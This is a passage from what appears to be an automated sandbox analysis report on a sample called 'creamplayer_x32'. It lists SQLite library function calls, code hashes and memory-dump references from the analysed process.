                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_malloc$memcmpsqlite3_mutex_enter
                                                                                                    • String ID:
                                                                                                    • API String ID: 571598680-0
                                                                                                    • Opcode ID: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                                                                    • Instruction ID: 53ad94a03898eae12f4127695087571842428d6fdffc19c65fee49adcf86f1ae
                                                                                                    • Opcode Fuzzy Hash: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                                                                    • Instruction Fuzzy Hash: 5E91F674E14228CFEB14CFA9D890B9EBBB6BB99304F1085AAD849A7344D734DD81CF51
                                                                                                    APIs
                                                                                                    • sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                                                      • Part of subcall function 60962F28: sqlite3_log.SQLITE3 ref: 60962F5D
                                                                                                    • sqlite3_mprintf.SQLITE3 ref: 60963534
                                                                                                    • sqlite3_blob_open.SQLITE3 ref: 6096358B
                                                                                                    • sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                                                    • sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                                                    • sqlite3_free.SQLITE3 ref: 60963621
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_blob_bytessqlite3_blob_opensqlite3_blob_readsqlite3_blob_reopensqlite3_freesqlite3_logsqlite3_mallocsqlite3_mprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 4276469440-0
                                                                                                    • Opcode ID: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                                                                    • Instruction ID: 177081cd506585250240414a33056f89eeda992db91a315aff795e5fc91eaf1e
                                                                                                    • Opcode Fuzzy Hash: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                                                                    • Instruction Fuzzy Hash: C641E5B09087059FDB40DF29C48179EBBE6AF98354F01C87AE898DB354E734D841DB92
                                                                                                    APIs
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 6091A240
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 6091A24E
                                                                                                    • sqlite3_value_bytes.SQLITE3 ref: 6091A25A
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 6091A27C
                                                                                                    Strings
                                                                                                    • ESCAPE expression must be a single character, xrefs: 6091A293
                                                                                                    • LIKE or GLOB pattern too complex, xrefs: 6091A267
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_text$sqlite3_value_bytes
                                                                                                    • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                                                    • API String ID: 4080917175-264706735
                                                                                                    • Opcode ID: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                                                    • Instruction ID: 7e7232241edcba55bc41816b79a09feadaac9d75cc2fb544db44a2248cbef301
                                                                                                    • Opcode Fuzzy Hash: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                                                    • Instruction Fuzzy Hash: A4214C74A182198BCB00DF79C88165EBBF6FF64354B108AA9E864DB344E734DCC6CB95
                                                                                                    APIs
                                                                                                      • Part of subcall function 6092506E: sqlite3_log.SQLITE3 ref: 609250AB
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 609250E7
                                                                                                    • sqlite3_value_text16.SQLITE3 ref: 60925100
                                                                                                    • sqlite3_value_text16.SQLITE3 ref: 6092512C
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 6092513E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_text16$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID: library routine called out of sequence$out of memory
                                                                                                    • API String ID: 2019783549-3029887290
                                                                                                    • Opcode ID: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                                                    • Instruction ID: f6310061860eb79c45c0a7b6efb00bde58ba827c5a391e7df96a4cb3fbc4cfa9
                                                                                                    • Opcode Fuzzy Hash: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                                                    • Instruction Fuzzy Hash: 81014C70A083049BDB14AF69C9C170EBBE6BF64248F0488A9EC958F30EE775D8818B51
                                                                                                    APIs
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 609406E3
                                                                                                      • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940672
                                                                                                      • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940696
                                                                                                    • sqlite3_free.SQLITE3 ref: 609406F7
                                                                                                    • sqlite3_free.SQLITE3 ref: 60940705
                                                                                                    • sqlite3_free.SQLITE3 ref: 60940713
                                                                                                    • sqlite3_free.SQLITE3 ref: 6094071E
                                                                                                    • sqlite3_free.SQLITE3 ref: 60940729
                                                                                                    • sqlite3_free.SQLITE3 ref: 6094073C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_log$sqlite3_finalize
                                                                                                    • String ID:
                                                                                                    • API String ID: 1159759059-0
                                                                                                    • Opcode ID: 19269ae46022e444f8470c890b78f38089a522c4155da373e534dfec766a18bc
                                                                                                    • Instruction ID: 8ceab58ab7f3fb7faec85fb80e78016d1f3d655de586deaf1cb04ee1bc4e3406
                                                                                                    • Opcode Fuzzy Hash: 19269ae46022e444f8470c890b78f38089a522c4155da373e534dfec766a18bc
                                                                                                    • Instruction Fuzzy Hash: C801E8B45447108BDB00AF78C4C5A59BBE5EF79B18F06096DECCA8B305D734D8809B91
                                                                                                    APIs
                                                                                                    • sqlite3_free.SQLITE3(?), ref: 609476DD
                                                                                                      • Part of subcall function 60904423: sqlite3_mutex_leave.SQLITE3(6090449D,?,?,?,60908270), ref: 60904446
                                                                                                    • sqlite3_log.SQLITE3 ref: 609498F5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_logsqlite3_mutex_leave
                                                                                                    • String ID: List of tree roots: $d$|
                                                                                                    • API String ID: 3709608969-1164703836
                                                                                                    • Opcode ID: 316fa83f4dc1e403b3b617744d66ff6f9af545e53e2752a9ff9486d467efffaf
                                                                                                    • Instruction ID: c91562837ba2d96ae21b52ab8334c840e7cbe23d8154f1acff92b465618a0bd4
                                                                                                    • Opcode Fuzzy Hash: 316fa83f4dc1e403b3b617744d66ff6f9af545e53e2752a9ff9486d467efffaf
                                                                                                    • Instruction Fuzzy Hash: 3FE10570A043698BDB22CF18C88179DFBBABF65304F1185D9E858AB251D775DE81CF81
                                                                                                    APIs
                                                                                                      • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                                                      • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                                                      • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                                                      • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                                                    • sqlite3_column_int64.SQLITE3 ref: 609600BA
                                                                                                    • sqlite3_column_text.SQLITE3 ref: 609600EF
                                                                                                    • sqlite3_free.SQLITE3 ref: 6096029A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_bind_int64sqlite3_column_int64sqlite3_column_textsqlite3_freesqlite3_resetsqlite3_result_error_codesqlite3_step
                                                                                                    • String ID: e
                                                                                                    • API String ID: 786425071-4024072794
                                                                                                    • Opcode ID: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                                                    • Instruction ID: e80500568aa73e744b5c90812a7938b6c4ac38b40afb48beb036dafaf3e7d002
                                                                                                    • Opcode Fuzzy Hash: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                                                    • Instruction Fuzzy Hash: 6291E270A18609CFDB04CF99C494B9EBBF2BF98314F108529E869AB354D774E885CF91
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_exec
                                                                                                    • String ID: sqlite_master$sqlite_temp_master$|
                                                                                                    • API String ID: 2141490097-2247242311
                                                                                                    • Opcode ID: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                                                                    • Instruction ID: 9143400cfb6dc20a8edc2ca7c04099347fc9d468871a1d2187ae3123f936d49a
                                                                                                    • Opcode Fuzzy Hash: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                                                                    • Instruction Fuzzy Hash: C551B6B09083289BDB26CF18C885799BBFABF59304F108599E498A7351D775DA84CF41
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$memcmpsqlite3_realloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 3422960571-0
                                                                                                    • Opcode ID: 50eda45380483794e32bdd730fc6b6b580c41d30328003452ec2c22d7d846426
                                                                                                    • Instruction ID: 3b390e38dde49c5924589a602beaf2ee173d98914be71c714148da16d267e2cf
                                                                                                    • Opcode Fuzzy Hash: 50eda45380483794e32bdd730fc6b6b580c41d30328003452ec2c22d7d846426
                                                                                                    • Instruction Fuzzy Hash: 42B1D0B4E142189BEB05CFA9C5807DDBBF6BFA8304F148429E858A7344D374E946CF91
                                                                                                    APIs
                                                                                                      • Part of subcall function 6090A0D5: sqlite3_free.SQLITE3 ref: 6090A118
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 6094B1D1
                                                                                                    • sqlite3_value_bytes.SQLITE3 ref: 6094B24C
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 6094B272
                                                                                                    • sqlite3_value_blob.SQLITE3 ref: 6094B298
                                                                                                    • sqlite3_free.SQLITE3 ref: 6094B2C8
                                                                                                      • Part of subcall function 6094A894: sqlite3_bind_int64.SQLITE3 ref: 6094A8C0
                                                                                                      • Part of subcall function 6094A894: sqlite3_step.SQLITE3 ref: 6094A8CE
                                                                                                      • Part of subcall function 6094A894: sqlite3_column_int64.SQLITE3 ref: 6094A8E9
                                                                                                      • Part of subcall function 6094A894: sqlite3_reset.SQLITE3 ref: 6094A90F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_malloc$sqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_stepsqlite3_value_blobsqlite3_value_bytes
                                                                                                    • String ID:
                                                                                                    • API String ID: 683514883-0
                                                                                                    • Opcode ID: 3036fcfce1ee653ed62d56f61367963e4d2afc4bfe1ca560103df060be3b8356
                                                                                                    • Instruction ID: 83940ce9cf0a2bab7a741171fc95cc3a005d2848f59039768723a80715f2adcb
                                                                                                    • Opcode Fuzzy Hash: 3036fcfce1ee653ed62d56f61367963e4d2afc4bfe1ca560103df060be3b8356
                                                                                                    • Instruction Fuzzy Hash: E19133B1A052099FCB04CFA9D490B9EBBF6FF68314F108569E855AB341DB34ED81CB91
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A200
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A391
                                                                                                    • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A3A3
                                                                                                    • sqlite3_free.SQLITE3 ref: 6093A3BA
                                                                                                    • sqlite3_free.SQLITE3 ref: 6093A3C2
                                                                                                      • Part of subcall function 6093A0C5: sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                                                      • Part of subcall function 6093A0C5: sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                                                      • Part of subcall function 6093A0C5: sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                                                      • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                                                      • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_free$sqlite3_mutex_enter
                                                                                                    • String ID:
                                                                                                    • API String ID: 1903298374-0
                                                                                                    • Opcode ID: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                                                                    • Instruction ID: f6c450fbbadf2e04ab128defb7df19fdb2a161b4e6cf4e71623f80625393026f
                                                                                                    • Opcode Fuzzy Hash: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                                                                    • Instruction Fuzzy Hash: EB513870A047218BDB58DF69C8C074AB7A6BF65318F05896CECA69B305D735EC41CF91
                                                                                                    APIs
                                                                                                      • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                                                    • sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                                                    • sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                                                    • sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                                                                                    • String ID:
                                                                                                    • API String ID: 1894464702-0
                                                                                                    • Opcode ID: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                                                                    • Instruction ID: 8ebadd1dc7ee404a0f141fd21885e91e0aa1156a5a6df10951b92a0b718128ce
                                                                                                    • Opcode Fuzzy Hash: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                                                                    • Instruction Fuzzy Hash: CF313C70B086118BDB18DF79C8C1A1A7BFBBFB2704F148468E8418B219EB35DC419F91
                                                                                                    APIs
                                                                                                      • Part of subcall function 60925326: sqlite3_log.SQLITE3 ref: 60925352
                                                                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,609254CC), ref: 6092538E
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 609253C4
                                                                                                    • sqlite3_log.SQLITE3 ref: 609253E2
                                                                                                    • sqlite3_log.SQLITE3 ref: 60925406
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 60925443
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_log$sqlite3_mutex_leave$sqlite3_mutex_enter
                                                                                                    • String ID:
                                                                                                    • API String ID: 3336957480-0
                                                                                                    • Opcode ID: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                                                    • Instruction ID: a100dd02d465b32589d57b5b9efe4db3cd483c3b5de54de748c9b161d5d001e2
                                                                                                    • Opcode Fuzzy Hash: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                                                    • Instruction Fuzzy Hash: D3315A70228704DBDB00EF28D49575ABBE6AFA1358F00886DE9948F36DD778C885DB02
                                                                                                    APIs
                                                                                                    • sqlite3_result_blob.SQLITE3 ref: 609613D0
                                                                                                    • sqlite3_column_int.SQLITE3 ref: 6096143A
                                                                                                    • sqlite3_data_count.SQLITE3 ref: 60961465
                                                                                                    • sqlite3_column_value.SQLITE3 ref: 60961476
                                                                                                    • sqlite3_result_value.SQLITE3 ref: 60961482
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_column_intsqlite3_column_valuesqlite3_data_countsqlite3_result_blobsqlite3_result_value
                                                                                                    • String ID:
                                                                                                    • API String ID: 3091402450-0
                                                                                                    • Opcode ID: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                                                                    • Instruction ID: 8b12398a3b1f37ca0d2e1a8d549e1f0529ecbd38da511dd0edd3444da8e5cc4d
                                                                                                    • Opcode Fuzzy Hash: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                                                                    • Instruction Fuzzy Hash: 72314DB19082058FDB00DF29C48064EB7F6FF65354F19856AE8999B361EB34E886CF81
                                                                                                    APIs
